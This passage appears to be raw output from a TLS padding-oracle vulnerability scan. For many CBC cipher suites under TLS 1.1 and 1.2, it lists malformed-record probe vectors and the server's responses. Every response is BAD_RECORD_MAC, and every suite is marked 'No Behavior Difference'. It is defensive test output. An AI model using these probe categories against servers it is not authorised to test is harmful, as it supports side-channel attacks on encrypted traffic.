	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA - TLS11 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA - TLS11 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS11 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_RSA_WITH_AES_128_CBC_SHA - TLS11 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - TLS11 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 - TLS12 - No Behavior Difference
	Response Map
	BasicMac-47-01 [BAD_RECORD_MAC] ENC X
	BasicMac-24-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-31 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[15]-0-31 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-31 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-31 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-31 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-31 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-31 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[15]-0-31 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-31 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-25-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-25-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-25-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-25-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-25-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-25-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-25-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-25-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-25-6 [BAD_RECORD_MAC] ENC X
	TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA - TLS12 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 - TLS12 - No Behavior Difference
	Response Map
	BasicMac-31-01 [BAD_RECORD_MAC] ENC X
	BasicMac-16-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[23]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-47 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-47 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-47 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[23]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-41-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-41-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-41-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-41-6 [BAD_RECORD_MAC] ENC X
	TLS_DHE_RSA_WITH_AES_256_CBC_SHA - TLS12 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS12 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_RSA_WITH_AES_256_CBC_SHA256 - TLS12 - No Behavior Difference
	Response Map
	BasicMac-31-01 [BAD_RECORD_MAC] ENC X
	BasicMac-16-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[23]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-47 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-47 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-47 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[23]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-41-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-41-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-41-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-41-6 [BAD_RECORD_MAC] ENC X
	TLS_RSA_WITH_AES_256_CBC_SHA - TLS12 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - TLS12 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 - TLS12 - No Behavior Difference
	Response Map
	BasicMac-31-01 [BAD_RECORD_MAC] ENC X
	BasicMac-16-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[23]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-47 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-47 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-47 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[23]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-41-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-41-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-41-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-41-6 [BAD_RECORD_MAC] ENC X
	TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA - TLS12 - No Behavior Difference
	Response Map
	BasicMac-19-01 [BAD_RECORD_MAC] ENC X
	BasicMac-10-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-59 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[29]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-59 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-53-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-53-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-53-6 [BAD_RECORD_MAC] ENC X
	TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 - TLS12 - No Behavior Difference
	Response Map
	BasicMac-31-01 [BAD_RECORD_MAC] ENC X
	BasicMac-16-08 [BAD_RECORD_MAC] ENC X
	BasicMac-0-80 [BAD_RECORD_MAC] ENC X
	MissingMacByteFirst [BAD_RECORD_MAC] ENC X
	MissingMacByteLast [BAD_RECORD_MAC] ENC X
	Plain XF (0xXF=#padding bytes) [BAD_RECORD_MAC] ENC X
	Plain FF [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[23]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-0-47 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-0-47 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-0-47 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[23]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-0-47 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[0]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[3]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadValMac-[last]-41-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[0]-41-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[8]-41-6 [BAD_RECORD_MAC] ENC X
	ValPadInvMac-[15]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[0]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[3]-41-6 [BAD_RECORD_MAC] ENC X
	InvPadInvMac-[last]-41-6 [BAD_RECORD_MAC] ENC X
